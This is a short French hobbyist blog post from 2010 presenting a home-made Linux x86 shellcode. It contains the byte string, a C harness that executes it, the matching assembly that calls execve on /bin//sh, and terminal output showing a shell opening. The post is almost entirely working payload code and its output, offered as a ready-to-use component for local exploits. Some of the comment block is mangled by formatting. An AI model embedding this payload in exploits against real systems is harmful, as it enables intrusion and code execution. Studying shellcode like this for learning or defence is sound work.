Hiteck
Shellcoding
Vendredi 18 juin 2010 :
Enfin un vrai shellcode qui ouvre un shell c'est magnifique tout sa :-D
hiteck@hiteck:~/Bureau/exploits$ cat exploit.c
/************************************************************************
- Shellcode cree par hit3ck *
- Pour tous renseignement : *
- http://wiki.hackbbs.org/index.php/Journal_intrusion_systeme_by_hit3ck *
- Disponible sur les canals de #hackbbs et #hzv *
- /
- /
- include <stdio.h>
char shellcode[] = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";
int main(void)
{
printf("***********************\n");
printf("* Shellcode by hit3ck *\n");
printf("***********************\n");
printf("* taille : %d *\n",sizeof(shellcode)-1);
printf("***********************\n");
(*(void(*)()) shellcode)();
}
hiteck@hiteck:~/Bureau/exploits$ cat shell.s
main:
xorl %eax,%eax
xorl %ebx,%ebx
xorl %ecx,%ecx
xorl %edx,%edx
push %edx
push $0x68732f6e
push $0x69622f2f
mov %esp,%ebx
push %edx
push %ebx
mov %esp,%ecx
mov $11,%al
int $0x80
hiteck@hiteck:~/Bureau/exploits$ ./exploit
- Shellcode by hit3ck *
- taille : 29 *
$ whoami
hiteck
$ echo "Local exploit shellcode reussi :-D"
Local exploit shellcode reussi :-D
$ exit
hiteck@hiteck:~/Bureau/exploits$
A la prochaine :-D